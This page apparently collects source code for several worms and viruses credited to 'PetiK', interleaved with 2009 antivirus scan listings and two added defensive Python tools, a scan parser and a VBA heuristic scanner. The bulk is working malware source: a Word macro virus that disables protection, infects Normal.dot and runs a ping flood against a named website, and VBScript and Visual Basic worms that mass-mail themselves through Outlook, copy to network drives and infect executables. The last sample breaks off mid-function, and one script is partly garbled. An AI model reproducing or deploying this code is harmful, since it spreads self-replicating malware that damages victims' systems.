File size: 5192 bytes
MD5...: 722436ae848608575bdf5d7036f3d1a9
SHA1..: ca97b2f3ef477f327875b1373f14a34b88b565c6
PEiD..: PEtite v2.2
File Haram.htm received on 05.16.2009 11:58:32 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 VBS/Navigator.2
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 VBS/Navigator.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Bother
BitDefender 7.2 2009.05.16 VBS.Navigator.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.83
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage.B
F-Prot 4.4.4.56 2009.05.15 VBS/Navigator.A
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Navigator
Fortinet 3.117.0.0 2009.05.16 HTML/Vierka.A
GData 19 2009.05.16 VBS.Navigator.A
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Navigator
McAfee 5616 2009.05.15 W32/PetTick
McAfee+Artemis 5616 2009.05.15 W32/PetTick
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Navigator.2
Microsoft 1.4602 2009.05.16 Virus:VBS/Navigator.gen
NOD32 4080 2009.05.15 VBS/Petik
Norman 6.01.05 2009.05.16 VBS/Navigator.F
nProtect 2009.1.8.0 2009.05.16 VBS.Haram.A@mm
Panda 10.0.0.14 2009.05.16 W32/Petik.U.worm
PCTools 4.4.2.0 2009.05.15 VBS.Ngator.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 W32/Petik-Y
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETTICK.Y
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Ngator.A

Additional information
File size: 1571 bytes
MD5...: b358dde6d08d84cf4571df91509df185
SHA1..: bdec927521e2209aee0783b72b970b2211fb2d51
File Haram.vbs received on 05.16.2009 11:58:35 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.15 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 VBS/Navigator.1
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 Heuristic-31
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Randa
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.D5290353
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.84
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Mailworm1
F-Prot 4.4.4.56 2009.05.15 Heuristic-31
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Pica.X@mm
GData 19 2009.05.16 Generic.ScriptWorm.D5290353
Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based
K7AntiVirus 7.10.735 2009.05.14 VBS.Generic.MassMailer
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick.vbs
McAfee+Artemis 5616 2009.05.15 W32/PetTick.vbs
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Navigator.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.Y
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 -
nProtect 2009.1.8.0 2009.05.16 VBS.Haram.A@mm
Panda 10.0.0.14 2009.05.16 -
PCTools 4.4.2.0 2009.05.15 VBS.Pethar.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.I-Worm.Lee-Based
Sophos 4.41.0 2009.05.16 W32/Petik-Y
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_GENERIC.009
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.15 VBS.Pethar.A

Additional information
File size: 721 bytes
MD5...: 0316dbe5df244e6a4fc18ce96e7b3907
SHA1..: 1fea896705358384a6889d1a223f1416b2880902
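The scan listings reproduced on this page (Haram.exe, Haram.htm, Haram.vbs and the others) all share one plain-text layout: engine, signature version, update date, result, with "-" when an engine reported nothing. The following Python is an added example, not code from the page: it parses that layout, computes the detection ratio, collects the distinct labels (which shows how inconsistent naming across vendors is) and lists engines whose signatures predate the scan date, since a miss from a stale engine says little. The sample input is constructed from five rows of the Haram.vbs listing above.

```python
"""Parse the plain-text multi-engine scan listings reproduced on this page.

Added example (not part of the original page). It assumes the row layout
seen above: engine, signature version, update date (YYYY.MM.DD) and a result
that may contain spaces, with "-" meaning no detection.
"""
import re
from dataclasses import dataclass
from typing import List

ROW_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d{4}\.\d{2}\.\d{2})\s+(.+?)\s*$")


@dataclass
class ScanRow:
    engine: str
    version: str
    updated: str   # YYYY.MM.DD, so plain string comparison orders dates
    result: str    # "-" when the engine reported nothing


def parse_report(text: str) -> List[ScanRow]:
    """Keep only lines that fit the row pattern; headers and hashes are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(ScanRow(*m.groups()))
    return rows


def detected(rows):
    return [r for r in rows if r.result != "-"]


def summarize(text: str) -> dict:
    rows = parse_report(text)
    hits = detected(rows)
    return {
        "engines": len(rows),
        "detected": len(hits),
        "ratio": (len(hits) / len(rows)) if rows else 0.0,
        # distinct labels, useful to see how inconsistent naming is
        "labels": sorted({r.result for r in hits}),
    }


def stale_engines(rows, report_date: str):
    """Engines whose signatures predate the day the sample was scanned."""
    return [r.engine for r in rows if r.updated < report_date]


# Constructed sample in the page's layout (five of the rows for Haram.vbs above).
SAMPLE_REPORT = """File Haram.vbs received on 05.16.2009 11:58:35 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
Antiy-AVL 2.0.3.1 2009.05.15 -
NOD32 4080 2009.05.15 probably unknown SCRIPT
Prevx 3.0 2009.05.16 -
Sophos 4.41.0 2009.05.16 W32/Petik-Y
"""

if __name__ == "__main__":
    print(summarize(SAMPLE_REPORT))
    print(stale_engines(parse_report(SAMPLE_REPORT), "2009.05.16"))
```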
' Name : W97M.Blood
' Author : PetiK
' Language : VBA Word
' Date : June 18th 2001
' Size : 2701 byte
'
'
'
'
' Macro AutoOpen : Disables all protection against viruses. Creates
' \WINDOWS\blood.sys and puts the macro code in it. If the Blood key does
' not exist under the Windows key in the registry, W97M.Blood infects
' "NORMAL.DOT". If the current day is the 15th, it replaces the name of the
' owner and the organization with "BloodMan" and "PetiK Corporation".
'
' Macro HelpAbout : It displays a balloon message.
'
' Macro ViewVBCode : Adds a value in the Run key to disable the mouse
' and displays a message box.
'
' Macro AutoClose : It shows a message box. After that it calls two
' other macros.
' Macro PetiK : Creates the folder \WINDOWS\Blood and puts the file
' TitleBlood.txt in it.
' Macro Attak : It pings the fucking web site of "Front National".
' It's a DoS attack.

Attribute VB_Name = "Blood"


Sub AutoOpen()
On Error Resume Next
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&

WordBasic.DisableAutoMacros 0
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
win = Environ("windir")
DropFile = win & "\blood.sys"
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") <> "OK" Then
Doc("Blood").Export DropFile
Nor.Import DropFile
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Blood\", "InfectDot") = "OK"
End If
If Doc.Item("Blood").Name <> "Blood" Then
Nor("Blood").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If

If Day(Now) = 15 Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "BloodMan"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "PetiK Corporation"
End If

End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "W97M.Blood.A coded by PetiK (c)2001"
.Heading = "W97M.Blood"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
End Sub

Sub ViewVBCode()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "Blood1") = "rundll32 mouse,disable"
MsgBox "Your computer is dead." + vbCr + "Don't stop your machine", vbCritical, "W97M.Blood"
ShowVisualBasicEditor = True
End Sub

Sub AutoClose()
MsgBox "PetiK vous souhaite une très bonne journée", vbExclamation, "W97M.Blood"
Call PetiK
Call Attak
End Sub

Sub PetiK()
On Error Resume Next
win = Environ("windir")
FileSystem.MkDir win & "\Blood"
Open win & "\Blood\TitleBlood.txt" For Output As #1
Print #1, "For the new Macro Virus W97M.Blood by PetiK"
Print #1, ""
Print #1, "Hi " & Application.UserName & ","
Print #1, "How do you do ?"
Print #1, "Your computer is infected by Blood"
Print #1, "It's not a dangerous macro."
Print #1, " Bye. PetiK"
Close #1
FileSystem.SetAttr win & "\Blood\TitleBlood.txt", vbReadOnly
End Sub

Sub Attak()
Shell "ping -l 5000 -t www.front-national.fr", vbHide
Shell "ping -l 5000 -t front-national.fr", vbHide
End Sub
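Everything the AutoOpen macro above needs in order to survive is visible in its source: Options.VirusProtection switched off, the Word Security "Level" value written to 1, the module exported and imported into the Normal template, a Run-key write, and Shell commands. Those are the strings a triage tool can look for in VBA exported from a document (for instance with an OLE/VBA extractor). The following Python is an added example, not code from the page or from W97M.Blood; its rules are heuristics derived from the module above, the sample is constructed on the same pattern, and the ping target in it is a placeholder.

```python
"""Static heuristics for Word macro source that tampers with macro security.

Added example (not part of the original page or of W97M.Blood). The patterns
come from the behaviour visible in the module above: switching off
Options.VirusProtection, writing Level=1 under the Word\\Security registry
key, exporting/importing VBComponents into the Normal template, persisting via
the CurrentVersion\\Run key and spawning shell commands. They are heuristics
for triage, not a substitute for an AV engine.
"""
import re

HEURISTICS = [
    ("disables_word_virus_protection", re.compile(r"\.VirusProtection\s*=\s*False", re.I)),
    ("lowers_macro_security_level", re.compile(r'Word\\Security"\s*,\s*"Level"\s*\)\s*=\s*1', re.I)),
    ("disables_auto_macro_prompt", re.compile(r"\bDisableAutoMacros\b", re.I)),
    ("touches_normal_template_project", re.compile(r"NormalTemplate\.VBProject", re.I)),
    ("exports_or_imports_module", re.compile(r"\.(Export|Import)\s", re.I)),
    ("writes_run_key", re.compile(r"CurrentVersion\\Run\\", re.I)),
    ("spawns_shell", re.compile(r"\bShell\s+\"", re.I)),
]


def scan_vba(source: str):
    """Return (heuristic, line_number, line) for every line that trips a rule."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, rx in HEURISTICS:
            if rx.search(line):
                findings.append((name, lineno, line.strip()))
    return findings


def risk_score(findings) -> int:
    """Number of distinct heuristics hit; three or more is worth a human look."""
    return len({name for name, _, _ in findings})


# Constructed sample modelled on the AutoOpen/Attak macros above; the ping
# target is a placeholder, not the one in the original.
SAMPLE_VBA = r'''Sub AutoOpen()
With Options
.VirusProtection = False
End With
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Set Nor = NormalTemplate.VBProject.VBComponents
Doc("Blood").Export DropFile
End Sub
Sub Attak()
Shell "ping -l 5000 -t host.example.invalid", vbHide
End Sub
'''

if __name__ == "__main__":
    for finding in scan_vba(SAMPLE_VBA):
        print(finding)
    print("score:", risk_score(scan_vba(SAMPLE_VBA)))
```

The rules are line based on purpose: the registry write is split over two lines in some extractions of this page, and the second line alone still carries the "Word\Security", "Level") = 1 fragment the rule keys on.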
File Blood.doc received on 05.16.2009 10:45:39 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Petman.A!IK
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.15 W97M/Petman.A
Avast 4.8.1335.0 2009.05.15 MW97:Petman-A
AVG 8.5.0.336 2009.05.15 W97M/Petman
BitDefender 7.2 2009.05.16 W97M.Petman.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 WM.Pivis
Comodo 1157 2009.05.08 Virus.MSWord.Petik
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNtp
eTrust-Vet 31.6.6508 2009.05.16 W97M/Petman.A
F-Prot 4.4.4.56 2009.05.15 W97M/Petman.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Petik
Fortinet 3.117.0.0 2009.05.16 W97M/Petman.A
GData 19 2009.05.16 W97M.Petman.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Petman.A
K7AntiVirus 7.10.735 2009.05.14 Macro.Petik
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Petik
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Petman.A
NOD32 4080 2009.05.15 W97M/Petman.A
Norman 6.01.05 2009.05.16 W97M/Petman.A
nProtect 2009.1.8.0 2009.05.16 W97M.Petman.A
Panda 10.0.0.14 2009.05.15 W97M/Kodak.worm
PCTools 4.4.2.0 2009.05.15 WORD.97.Petik.M
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 Macro.Word97.Petik
Sophos 4.41.0 2009.05.16 WM97/Dool-A
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Petik (v)
Symantec 1.4.4.12 2009.05.16 W97M.Pet_Tick.Intd
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_PETMAN.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Blood
ViRobot 2009.5.15.1737 2009.05.15 W97M.Petman.A
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Petik.M

Additional information
File size: 36864 bytes
MD5...: 8cd23603a72f1dcbdf22e03d49c17f83
SHA1..: f970fea6b876ba8d133900ceb55a14bf0c307335
' Name : VBS.Cachemire
' Author : PetiK
' Language : VBS
' Date : 19/06/2002

On error resume next

fs="FileSystemObject"
sc="Scripting"
wsc="WScript"
sh="Shell"
nt="Network"
crlf=Chr(13)&Chr(10)

Set fso=CreateObject(sc & "." & fs)


Set ws=CreateObject(wsc & "." & sh)
Set ntw=CreateObject(wsc & "." & nt)
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
desk=ws.SpecialFolders("Desktop")
strp=ws.SpecialFolders("StartUp")

Set fl=fso.OpenTextFile(WScript.ScriptFullName,1)
wrm=fl.ReadAll
fl.Close

If WScript.ScriptFullName <> sys&"\MsBackup.vbs" Then


MsgBox "Sorry but the file """ & WScript.ScriptName & """ is not a valid VBS file",vbcritical,"ALERT"
fso.GetFile(WScript.ScriptFullName).Copy(sys&"\MsBackup.vbs")
'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MsBackup",sys&"\MsBackup.vbs"
netn=""
For cnt = 1 To 8
netn=netn & Chr(Int(Rnd(1) * 26) + 97)
Next
netn = netn & ".vbs"
msgbox netn
Loop
spreadnetwrk(netn)

set lnk = ws.CreateShortcut(desk & "\Surprise.lnk")


lnk.TargetPath = sys&"\MsBackup.vbs"
lnk.WindowStyle = 1
lnk.Hotkey = "CTRL+SHIFT+F"
lnk.IconLocation = "wscript.exe, 0"
lnk.Description = "Surprise"
lnk.WorkingDirectory = sys
lnk.Save
Else

y=0

Do Until y=Day(Now)
Sub spreadout()
y=y+1
Loop
If Day(Now) = Int((31 * Rnd) + 1) Then
ws.Run "notepad.exe"
wscript.Sleep 200
ws.SendKeys "Date : " & date & vbLf
ws.SendKeys "Time : " & time & crlf
x = 0
Do Until x=6
num = Int((6 * Rnd) + 1)
If num = 1 Then
mess = "You're infected by my new VBS virus. " & VbLf & "Don't panic, it's not Dangerous" & vbCrlf
ElseIf num = 2 Then mess = "Why do you click unknown file ??" & crlf
ElseIf num = 3 Then mess = "A new creation coded by PetiK/[b8]" & crlf
ElseIf num = 4 Then mess = "Contact an AV support to disinfect your system" & crlf
ElseIf num = 5 Then mess = "Be careful next time" & crlf
ElseIf num = 6 Then mess = "Curiosity is bad" & crlf
End If
For i = 1 to Len(mess)
ws.SendKeys Mid(mess,i,1)
wscript.Sleep 50
Next
x=x+1
Loop
End If

End If

Sub spreadnetwrk(nname)
Set drve = ntw.EnumNetworkDrives
If drve.Count > 0 Then
For j = 0 To drve.Count -1
If drve.Item(j) <> "" Then
fso.GetFile(WScript.ScriptFullName).Copy(drve.Item(j) & "\" & nname)
End If
Next
End If
End Sub

Sub spreadout()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For Each C In B.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="Backup your system..."
F.Body="Use this tool to create a backup of your system..."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add(sys&"\MsBackup.vbs")
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
File Cachemire.vbs received on 05.16.2009 11:21:06 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 VBS/Petik.C
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.L
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.15 VBS/Petik.I@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.91D6A07B
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.Petik.l
Comodo 1157 2009.05.08 Worm.Win32.Petik.l
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.43
eSafe 7.0.17.0 2009.05.14 VBS.MailSender.
eTrust-Vet 31.6.6508 2009.05.16 VBS/SSIWG2
F-Prot 4.4.4.56 2009.05.15 VBS/Petik.I@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik.l
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.L@mm
GData 19 2009.05.16 Generic.ScriptWorm.91D6A07B
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik.l
McAfee 5616 2009.05.15 VBS/Pica.worm.gen
McAfee+Artemis 5616 2009.05.15 VBS/Pica.worm.gen
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.L
Microsoft 1.4602 2009.05.16 Virus:VBS/Emire
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 VBS/GenMail.D
nProtect 2009.1.8.0 2009.05.16 VBS.Petchem.A
Panda 10.0.0.14 2009.05.15 Worm Generic
PCTools 4.4.2.0 2009.05.15 VBS.Petchem.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Pica-G
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Camire.Int
TheHacker 6.3.4.1.326 2009.05.15 VBS/Mass.worm.gen
TrendMicro 8.950.0.1092 2009.05.15 VBS_PICA.GEN
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik.l
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family

Additional information
File size: 2832 bytes
MD5...: 175dbf33282ed471b62d616be435a03f
SHA1..: 8d0a9298ab3af4827f47a90e3fbbe7073e5a9376
' Name : W32.HLLW.Mars
' Author : PetiK
' Language : Visual Basic
' Date : 20/06/2002
'
'
'
'
Attribute VB_Name = "Module1"
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet" (ByVal hInet As Long) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal hFile As Long, ByVal sBuffer As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
Private Declare Function SetCurrentDirectory Lib "kernel32" Alias "SetCurrentDirectoryA" (ByVal lpPathName As String) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Public sysDir As String
Public winDir As String
Public orig As String
Public cop As String
Const CSIDL_STARTUP = &H7
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type

Sub Main()
On Error Resume Next
Dim sp, ext(1 To 9) As String, exts
ext(1) = "index.htm"
ext(2) = "index.html"
ext(3) = "index.asp"
ext(4) = "default.htm"
ext(5) = "default.html"
ext(6) = "default.asp"
ext(7) = "main.htm"
ext(8) = "main.html"
ext(9) = "main.asp"

Set ws = CreateObject("WScript.Shell")
sysDir = Space(500)
sysDir = Left(sysDir, GetSystemDirectory(sysDir, Len(sysDir)))
winDir = Space(500)
winDir = Left(sysDir, GetWindowsDirectory(winDir, Len(winDir)))
orig = App.Path & "\" & App.EXEName & ".exe"
Call Install
Call VbsDrop
Call InfectExe(sysDir)
Call InfectExe(winDir)

checkconnect:
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo checkconnect

sp = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")


If Len(sp) <> 0 Then
If Right(sp, 1) = "/" Then
For i = 1 To 9
Call srchmail(sp & ext(i))
Next i
ElseIf Right(sp, 4) <> ".htm" And Right(sp, 5) <> ".html" Then
For i = 1 To 9
Call srchmail(sp & "/" & ext(i))
Next i
Else
End If
End If

End Sub

Sub Install()
On Error Resume Next
Set ws = CreateObject("WScript.Shell")
FileCopy orig, sysDir & "\DebugW32.exe"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug", sysDir & "\DebugW32.exe"
End Sub

Private Function GetSpecialfolder(CSIDL As Long) As String


Dim r As Long
Dim IDL As ITEMIDLIST
r = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If r = NOERROR Then
Path$ = Space$(512)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function

Sub VbsDrop()
On Error Resume Next
Dim lngbufferlen
Dim bbyte As Byte
Dim pefile As String
orig = App.Path & "\" & App.EXEName & ".exe"
vbfle = GetSpecialfolder(CSIDL_STARTUP) & "\start.vbs"

Open orig For Binary As #1


DoEvents
Do While Not EOF(1)
DoEvents
Get #1, , bbyte
e = Hex(bbyte)
If Len(e) = 1 Then e = "0" & Hex(bbyte)
pefile = pefile & e
Loop
Close #1

vbsf = "'Mars" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"Set fso=CreateObject(""Scripting.FilesystemObject"")" & vbCrLf & _
"Set ws=CreateObject(""WScript.Shell"")" & vbCrLf & vbCrLf & _
"pevb=""" & pefile & """" & vbCrLf & _
"read = dec(pevb)" & vbCrLf & _
"Set r = fso.CreateTextFile(fso.GetSpecialFolder(1) & ""\DebugW32.exe"", 2)" & vbCrLf & _
"r.Write read" & vbCrLf & _
"r.Close" & vbCrLf & _
"ws.RegWrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Debug"", fso.GetSpecialFolder(1) & ""\DebugW32.exe""" & vbCrLf
vbsf2 = "For each fil in fso.GetFolder(ws.SpecialFolders(""MyDocuments"")).Files" & vbCrLf & _
"ext = LCase(fso.GetExtensionName(fil.Path))" & vbCrLf & _
"If ext <> ""vbs"" Then" & vbCrLf & _
"fso.GetFile(WScript.ScriptFullName).Copy(fil.Path & "".vbs"")" & vbCrLf & _
"End If" & vbCrLf & _
"For Each sf In fso.GetFolder(ws.SpecialFolders(""MyDocuments"")).SubFolders" & vbCrLf & _
"sprd(sf.Path)" & vbCrLf & _
"Next" & vbCrLf & _
"Next" & vbCrLf
vbsf3 = "Sub sprd(dir)" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"For Each fil In fso.GetFolder(dir).Files" & vbCrLf & _
"ext = LCase(fso.GetExtensionName(fil.Path))" & vbCrLf & _
"If ext <> ""vbs"" Then" & vbCrLf & _
"fso.GetFile(WScript.ScriptFullName).Copy(fil.Path & "".vbs"")" & vbCrLf & _
"End If" & vbCrLf & _
"Next" & vbCrLf & _
"For Each sf In fso.GetFolder(dir).SubFolders" & vbCrLf & _
"sprd(sf.Path)" & vbCrLf & _
"Next" & vbCrLf & _
"End Sub" & vbCrLf & vbCrLf & _
"Function dec(octe)" & vbCrLf & _
"For hexad = 1 To Len(octe) Step 2" & vbCrLf & _
"dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" & vbCrLf & _
"Next" & vbCrLf & _
"End Function" & vbCrLf
vbsf4 = "Sub SprdOut()" & vbCrLf & _
"Set outl=CreateObject(""Outlook.Application"")" & vbCrLf & _
"For Each C In outl.GetNameSpace(""MAPI"").AddressLists" & vbCrLf & _
"If C.AddressEntries.Count <> 0 Then" & vbCrLf & _
"For dcnt=1 To C.AddressEntries.Count" & vbCrLf & _
"Set courrier=outl.CreateItem(0)" & vbCrLf & _
"courrier.To=C.AddressEntries(dcnt).Address" & vbCrLf & _
"courrier.Subject=""Important EMail for "" & C.AddressEntries(dcnt).Name" & vbCrLf & _
"courrier.Body=""Look at this attached file, it may be important.""" & vbCrLf & _
"courrier.Attachments.Add(wScript.ScriptFullName)" & vbCrLf & _
"courrier.DeleteafterSubmit=True" & vbCrLf & _
"If courrier.To <> """" Then" & vbCrLf & _
"courrier.Send" & vbCrLf & _
"End If" & vbCrLf & _
"Next" & vbCrLf & _
"End If" & vbCrLf & _
"Next" & vbCrLf
Open vbfle For Output As #1
Print #1, vbsf
Print #1, vbsf2
Print #1, vbsf3
Print #1, vbsf4
Close #1
End Sub

Sub InfectExe(dir As String)


On Error Resume Next
orig = App.Path & "\" & App.EXEName & ".exe"
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FolderExists(dir) Then
x = 0
For Each P In fso.GetFolder(dir).Files
ext = LCase(fso.GetExtensionName(P.Name))
nam = LCase(P.Name)

If ext = "exe" Then


If LCase(P.Name) <> "debugw32.exe" And (Right(LCase(P.Name), 9) <> "_vbpe.exe") Then
If Not fso.FileExists(P.Name & "_vbpe.exe") Then
FileCopy orig, dir & "\" & P.Name & "_vbpe.exe"
x = x + 1
End If
End If
End If
If x = 5 Then Exit For
Next
End If
End Sub
Sub srchmail(site As String)
On Error Resume Next
Set fso = CreateObject("Scripting.FilesystemObject")
